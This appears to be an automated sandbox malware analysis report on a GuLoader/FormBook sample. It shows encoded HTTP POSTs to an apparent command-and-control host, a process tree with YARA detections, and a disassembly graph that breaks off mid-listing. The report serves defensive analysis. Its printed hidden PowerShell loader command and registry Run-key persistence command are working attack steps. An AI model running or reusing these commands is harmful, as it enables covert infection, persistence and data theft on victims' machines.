                                                                      Date: Tue, 16 Apr 2024 15:17:58 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      15192.168.2.44975266.29.135.15980
                                                                      TimestampBytes transferredDirectionData
                                                                      Apr 16, 2024 17:18:01.771581888 CEST778OUTPOST /9pdo/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 223
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Host: www.eternalsunrise.xyz
                                                                      Origin: http://www.eternalsunrise.xyz
                                                                      Referer: http://www.eternalsunrise.xyz/9pdo/
                                                                      User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
                                                                      Data Raw: 65 64 52 30 68 46 3d 79 74 36 53 4d 41 6e 55 4d 6d 6b 4e 49 37 67 37 31 6c 37 72 78 58 5a 58 54 66 6d 75 6e 4f 50 46 59 79 37 4a 6f 6b 53 32 4e 73 35 51 43 4e 6b 65 39 63 4e 52 75 47 72 49 42 4b 2b 56 4a 4f 6e 5a 41 64 4d 42 32 2b 50 74 58 35 52 6f 30 43 71 71 69 36 49 36 65 4b 68 68 32 43 4a 6a 46 73 44 67 62 61 36 62 6d 31 6a 58 75 41 58 4c 4c 79 4c 77 45 57 51 78 47 59 67 46 4f 59 33 36 73 41 59 37 58 47 65 4a 76 45 4e 6c 6a 6d 31 68 69 4a 39 39 4a 59 46 47 61 47 7a 64 4e 70 79 6a 68 51 70 7a 32 54 32 6a 76 42 66 32 39 42 67 41 33 6f 66 4c 6f 72 61 46 56 79 48 6d 61 39 65 71 42 66 77 48 6c 46 62 6f 39 43 2b 5a 68 61 62 6c 2b 57 6e 32 35 38 62 56 6a 77 49 3d
                                                                      Data Ascii: edR0hF=yt6SMAnUMmkNI7g71l7rxXZXTfmunOPFYy7JokS2Ns5QCNke9cNRuGrIBK+VJOnZAdMB2+PtX5Ro0Cqqi6I6eKhh2CJjFsDgba6bm1jXuAXLLyLwEWQxGYgFOY36sAY7XGeJvENljm1hiJ99JYFGaGzdNpyjhQpz2T2jvBf29BgA3ofLoraFVyHma9eqBfwHlFbo9C+Zhabl+Wn258bVjwI=
                                                                      Apr 16, 2024 17:18:01.963171005 CEST533INHTTP/1.1 404 Not Found
                                                                      Date: Tue, 16 Apr 2024 15:18:01 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:17:15:53
                                                                      Start date:16/04/2024
                                                                      Path:C:\Users\user\Desktop\160420241245287.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\160420241245287.exe"
                                                                      Imagebase:0x400000
                                                                      File size:906'138 bytes
                                                                      MD5 hash:0FAF0632777806D9E8C13F1CA6FC3237
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:1
                                                                      Start time:17:15:54
                                                                      Start date:16/04/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"powershell.exe" -windowstyle hidden "$Titelbladenes=Get-Content 'C:\Users\user\AppData\Roaming\opbevaringssteder\Shrinkageproof\Ursa\Soklernes\Randrusianeren.Unf';$Ryslerne=$Titelbladenes.SubString(75194,3);.$Ryslerne($Titelbladenes)"
                                                                      Imagebase:0x600000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2067336932.000000000BC43000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:2
                                                                      Start time:17:15:54
                                                                      Start date:16/04/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:3
                                                                      Start time:17:15:55
                                                                      Start date:16/04/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
                                                                      Imagebase:0x240000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:7
                                                                      Start time:17:16:30
                                                                      Start date:16/04/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\Untapestried.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\Untapestried.exe"
                                                                      Imagebase:0x400000
                                                                      File size:906'138 bytes
                                                                      MD5 hash:0FAF0632777806D9E8C13F1CA6FC3237
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2169059789.00000000201B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2169059789.00000000201B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2169858516.0000000021220000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2169858516.0000000021220000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 11%, ReversingLabs
                                                                      • Detection: 18%, Virustotal, Browse
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:8
                                                                      Start time:17:16:33
                                                                      Start date:16/04/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)"
                                                                      Imagebase:0x7ff71e800000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:9
                                                                      Start time:17:16:33
                                                                      Start date:16/04/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:10
                                                                      Start time:17:16:33
                                                                      Start date:16/04/2024
                                                                      Path:C:\Windows\SysWOW64\reg.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)"
                                                                      Imagebase:0x920000
                                                                      File size:59'392 bytes
                                                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:11
                                                                      Start time:17:16:38
                                                                      Start date:16/04/2024
                                                                      Path:C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe"
                                                                      Imagebase:0xa40000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2887891622.0000000003350000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2887891622.0000000003350000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:12
                                                                      Start time:17:16:39
                                                                      Start date:16/04/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\SysWOW64\cmd.exe"
                                                                      Imagebase:0x240000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2887996952.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2887996952.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2887919458.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2887919458.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:13
                                                                      Start time:17:16:52
                                                                      Start date:16/04/2024
                                                                      Path:C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe"
                                                                      Imagebase:0xa40000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2887373536.0000000001100000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2887373536.0000000001100000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:14
                                                                      Start time:17:17:04
                                                                      Start date:16/04/2024
                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                      Imagebase:0x7ff6bf500000
                                                                      File size:676'768 bytes
                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Disassembly

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:21%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:25.6%
                                                                        Total number of Nodes:1393
                                                                        Total number of Limit Nodes:32
                                                                        execution_graph 4038 10001000 4039 10001112 83 API calls 4038->4039 4040 1000102b 4039->4040 4041 401d41 GetDC GetDeviceCaps 4042 402b1d 18 API calls 4041->4042 4043 401d5f MulDiv ReleaseDC 4042->4043 4044 402b1d 18 API calls 4043->4044 4045 401d7e 4044->4045 4046 405f0c 18 API calls 4045->4046 4047 401db7 CreateFontIndirectW 4046->4047 4048 4024e8 4047->4048 4049 401a42 4050 402b1d 18 API calls 4049->4050 4051 401a48 4050->4051 4052 402b1d 18 API calls 4051->4052 4053 4019f0 4052->4053 4054 404243 lstrcpynW lstrlenW 4055 402746 4056 402741 4055->4056 4056->4055 4057 402756 FindNextFileW 4056->4057 4058 4027a8 4057->4058 4060 402761 4057->4060 4061 405eea lstrcpynW 4058->4061 4061->4060 4062 401cc6 4063 402b1d 18 API calls 4062->4063 4064 401cd9 SetWindowLongW 4063->4064 4065 4029c7 4064->4065 4066 401dc7 4067 402b1d 18 API calls 4066->4067 4068 401dcd 4067->4068 4069 402b1d 18 API calls 4068->4069 4070 401dd6 4069->4070 4071 401de8 EnableWindow 4070->4071 4072 401ddd ShowWindow 4070->4072 4073 4029c7 4071->4073 4072->4073 4081 4045ca 4082 4045f6 4081->4082 4083 404607 4081->4083 4142 4056aa GetDlgItemTextW 4082->4142 4085 404613 GetDlgItem 4083->4085 4091 404672 4083->4091 4087 404627 4085->4087 4086 404601 4089 40617e 5 API calls 4086->4089 4090 40463b SetWindowTextW 4087->4090 4095 4059e0 4 API calls 4087->4095 4088 404756 4092 4048f7 4088->4092 4144 4056aa GetDlgItemTextW 4088->4144 4089->4083 4096 40412f 19 API calls 4090->4096 4091->4088 4091->4092 4097 405f0c 18 API calls 4091->4097 4094 404196 8 API calls 4092->4094 4099 40490b 4094->4099 4100 404631 4095->4100 4101 404657 4096->4101 4102 4046e6 SHBrowseForFolderW 4097->4102 4098 404786 4103 405a3d 18 API calls 4098->4103 4100->4090 4109 405935 3 API calls 4100->4109 4104 40412f 19 API calls 4101->4104 4102->4088 4105 4046fe CoTaskMemFree 4102->4105 4106 40478c 4103->4106 4107 404665 4104->4107 4108 405935 3 API calls 4105->4108 4145 405eea lstrcpynW 4106->4145 4143 404164 SendMessageW 4107->4143 4111 40470b 4108->4111 4109->4090 4114 404742 SetDlgItemTextW 4111->4114 4118 405f0c 18 API calls 4111->4118 4113 40466b 4116 406254 3 API calls 4113->4116 4114->4088 4115 4047a3 4117 406254 3 API calls 4115->4117 4116->4091 4125 4047ab 4117->4125 4119 40472a lstrcmpiW 4118->4119 4119->4114 4122 40473b lstrcatW 4119->4122 4120 4047ea 4146 405eea lstrcpynW 4120->4146 4122->4114 4123 4047f1 4124 4059e0 4 API calls 4123->4124 4126 4047f7 GetDiskFreeSpaceW 4124->4126 4125->4120 4129 405981 2 API calls 4125->4129 4131 40483c 4125->4131 4128 40481a MulDiv 4126->4128 4126->4131 4128->4131 4129->4125 4130 4048a6 4133 4048c9 4130->4133 4135 40140b 2 API calls 4130->4135 4131->4130 4147 404978 4131->4147 4155 404151 KiUserCallbackDispatcher 4133->4155 4134 404898 4136 4048a8 SetDlgItemTextW 4134->4136 4137 40489d 4134->4137 4135->4133 4136->4130 4140 404978 21 API calls 4137->4140 4139 4048e5 4139->4092 4156 40455f 4139->4156 4140->4130 4142->4086 4143->4113 4144->4098 4145->4115 4146->4123 4148 404995 4147->4148 4149 405f0c 18 API calls 4148->4149 4150 4049ca 4149->4150 4151 405f0c 18 API calls 4150->4151 4152 4049d5 4151->4152 4153 405f0c 18 API calls 4152->4153 4154 404a06 lstrlenW wsprintfW SetDlgItemTextW 4153->4154 4154->4134 4155->4139 4157 404572 SendMessageW 4156->4157 4158 40456d 4156->4158 4157->4092 4158->4157 4159 401bca 4160 402b1d 18 API calls 4159->4160 4161 401bd1 4160->4161 4162 402b1d 18 API calls 4161->4162 4163 401bdb 4162->4163 4164 401beb 4163->4164 4166 402b3a 18 API calls 4163->4166 4165 401bfb 4164->4165 4167 402b3a 18 API calls 4164->4167 4168 401c06 4165->4168 4169 401c4a 4165->4169 4166->4164 4167->4165 4170 402b1d 18 API calls 4168->4170 4171 402b3a 18 API calls 4169->4171 4172 401c0b 4170->4172 4173 401c4f 4171->4173 4174 402b1d 18 API calls 4172->4174 4175 402b3a 18 API calls 4173->4175 4177 401c14 4174->4177 4176 401c58 FindWindowExW 4175->4176 4180 401c7a 4176->4180 4178 401c3a SendMessageW 4177->4178 4179 401c1c SendMessageTimeoutW 4177->4179 4178->4180 4179->4180 4181 40194b 4182 402b1d 18 API calls 4181->4182 4183 401952 4182->4183 4184 402b1d 18 API calls 4183->4184 4185 40195c 4184->4185 4186 402b3a 18 API calls 4185->4186 4187 401965 4186->4187 4188 401979 lstrlenW 4187->4188 4189 4019b5 4187->4189 4190 401983 4188->4190 4190->4189 4194 405eea lstrcpynW 4190->4194 4192 40199e 4192->4189 4193 4019ab lstrlenW 4192->4193 4193->4189 4194->4192 4198 4042cc 4199 4042e4 4198->4199 4205 4043fe 4198->4205 4206 40412f 19 API calls 4199->4206 4200 404468 4201 404472 GetDlgItem 4200->4201 4202 40453a 4200->4202 4203 4044fb 4201->4203 4204 40448c 4201->4204 4207 404196 8 API calls 4202->4207 4203->4202 4212 40450d 4203->4212 4204->4203 4211 4044b2 6 API calls 4204->4211 4205->4200 4205->4202 4208 404439 GetDlgItem SendMessageW 4205->4208 4209 40434b 4206->4209 4219 404535 4207->4219 4229 404151 KiUserCallbackDispatcher 4208->4229 4210 40412f 19 API calls 4209->4210 4214 404358 CheckDlgButton 4210->4214 4211->4203 4215 404523 4212->4215 4216 404513 SendMessageW 4212->4216 4227 404151 KiUserCallbackDispatcher 4214->4227 4215->4219 4220 404529 SendMessageW 4215->4220 4216->4215 4217 404463 4221 40455f SendMessageW 4217->4221 4220->4219 4221->4200 4222 404376 GetDlgItem 4228 404164 SendMessageW 4222->4228 4224 40438c SendMessageW 4225 4043b2 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4224->4225 4226 4043a9 GetSysColor 4224->4226 4225->4219 4226->4225 4227->4222 4228->4224 4229->4217 4230 4024cc 4231 402b3a 18 API calls 4230->4231 4232 4024d3 4231->4232 4235 405b56 GetFileAttributesW CreateFileW 4232->4235 4234 4024df 4235->4234 4236 4019cf 4237 402b3a 18 API calls 4236->4237 4238 4019d6 4237->4238 4239 402b3a 18 API calls 4238->4239 4240 4019df 4239->4240 4241 4019e6 lstrcmpiW 4240->4241 4242 4019f8 lstrcmpW 4240->4242 4243 4019ec 4241->4243 4242->4243 4244 401e51 4245 402b3a 18 API calls 4244->4245 4246 401e57 4245->4246 4247 405194 25 API calls 4246->4247 4248 401e61 4247->4248 4249 405665 2 API calls 4248->4249 4250 401e67 4249->4250 4251 401ec6 CloseHandle 4250->4251 4252 401e77 WaitForSingleObject 4250->4252 4255 402793 4250->4255 4251->4255 4253 401e89 4252->4253 4254 401e9b GetExitCodeProcess 4253->4254 4256 40628d 2 API calls 4253->4256 4257 401eb8 4254->4257 4258 401ead 4254->4258 4259 401e90 WaitForSingleObject 4256->4259 4257->4251 4261 405e31 wsprintfW 4258->4261 4259->4253 4261->4257 3301 401752 3302 402b3a 18 API calls 3301->3302 3303 401759 3302->3303 3304 401781 3303->3304 3305 401779 3303->3305 3344 405eea lstrcpynW 3304->3344 3343 405eea lstrcpynW 3305->3343 3308 40177f 3312 40617e 5 API calls 3308->3312 3309 40178c 3345 405935 lstrlenW CharPrevW 3309->3345 3316 40179e 3312->3316 3317 4017b0 CompareFileTime 3316->3317 3318 401870 3316->3318 3321 405eea lstrcpynW 3316->3321 3327 405f0c 18 API calls 3316->3327 3336 401847 3316->3336 3339 405b31 GetFileAttributesW 3316->3339 3342 405b56 GetFileAttributesW CreateFileW 3316->3342 3348 40622d FindFirstFileW 3316->3348 3351 4056c6 3316->3351 3317->3316 3319 405194 25 API calls 3318->3319 3322 40187a 3319->3322 3320 405194 25 API calls 3338 40185c 3320->3338 3321->3316 3323 403062 46 API calls 3322->3323 3325 40188d 3323->3325 3324 4018a1 SetFileTime 3326 4018b3 FindCloseChangeNotification 3324->3326 3325->3324 3325->3326 3328 4018c4 3326->3328 3326->3338 3327->3316 3329 4018c9 3328->3329 3330 4018dc 3328->3330 3331 405f0c 18 API calls 3329->3331 3332 405f0c 18 API calls 3330->3332 3334 4018d1 lstrcatW 3331->3334 3335 4018e4 3332->3335 3334->3335 3337 4056c6 MessageBoxIndirectW 3335->3337 3336->3320 3336->3338 3337->3338 3340 405b50 3339->3340 3341 405b43 SetFileAttributesW 3339->3341 3340->3316 3341->3340 3342->3316 3343->3308 3344->3309 3346 405951 lstrcatW 3345->3346 3347 401792 lstrcatW 3345->3347 3346->3347 3347->3308 3349 406243 FindClose 3348->3349 3350 40624e 3348->3350 3349->3350 3350->3316 3353 4056db 3351->3353 3352 405727 3352->3316 3353->3352 3354 4056ef MessageBoxIndirectW 3353->3354 3354->3352 3355 4052d3 3356 4052f4 GetDlgItem GetDlgItem GetDlgItem 3355->3356 3357 40547f 3355->3357 3401 404164 SendMessageW 3356->3401 3359 4054b0 3357->3359 3360 405488 GetDlgItem CreateThread FindCloseChangeNotification 3357->3360 3362 4054db 3359->3362 3363 405500 3359->3363 3364 4054c7 ShowWindow ShowWindow 3359->3364 3360->3359 3424 405267 OleInitialize 3360->3424 3361 405365 3368 40536c GetClientRect GetSystemMetrics SendMessageW SendMessageW 3361->3368 3365 4054e7 3362->3365 3366 40553b 3362->3366 3410 404196 3363->3410 3406 404164 SendMessageW 3364->3406 3370 405515 ShowWindow 3365->3370 3371 4054ef 3365->3371 3366->3363 3377 405549 SendMessageW 3366->3377 3375 4053db 3368->3375 3376 4053bf SendMessageW SendMessageW 3368->3376 3373 405535 3370->3373 3374 405527 3370->3374 3407 404108 3371->3407 3379 404108 SendMessageW 3373->3379 3378 405194 25 API calls 3374->3378 3380 4053e0 SendMessageW 3375->3380 3381 4053ee 3375->3381 3376->3375 3382 405562 CreatePopupMenu 3377->3382 3383 40550e 3377->3383 3378->3373 3379->3366 3380->3381 3402 40412f 3381->3402 3384 405f0c 18 API calls 3382->3384 3386 405572 AppendMenuW 3384->3386 3390 4055a2 TrackPopupMenu 3386->3390 3391 40558f GetWindowRect 3386->3391 3387 4053fe 3388 405407 ShowWindow 3387->3388 3389 40543b GetDlgItem SendMessageW 3387->3389 3392 40542a 3388->3392 3393 40541d ShowWindow 3388->3393 3389->3383 3395 405462 SendMessageW SendMessageW 3389->3395 3390->3383 3394 4055bd 3390->3394 3391->3390 3405 404164 SendMessageW 3392->3405 3393->3392 3396 4055d9 SendMessageW 3394->3396 3395->3383 3396->3396 3397 4055f6 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3396->3397 3399 40561b SendMessageW 3397->3399 3399->3399 3400 405644 GlobalUnlock SetClipboardData CloseClipboard 3399->3400 3400->3383 3401->3361 3403 405f0c 18 API calls 3402->3403 3404 40413a SetDlgItemTextW 3403->3404 3404->3387 3405->3389 3406->3362 3408 404115 SendMessageW 3407->3408 3409 40410f 3407->3409 3408->3363 3409->3408 3411 4041ae GetWindowLongW 3410->3411 3421 404237 3410->3421 3412 4041bf 3411->3412 3411->3421 3413 4041d1 3412->3413 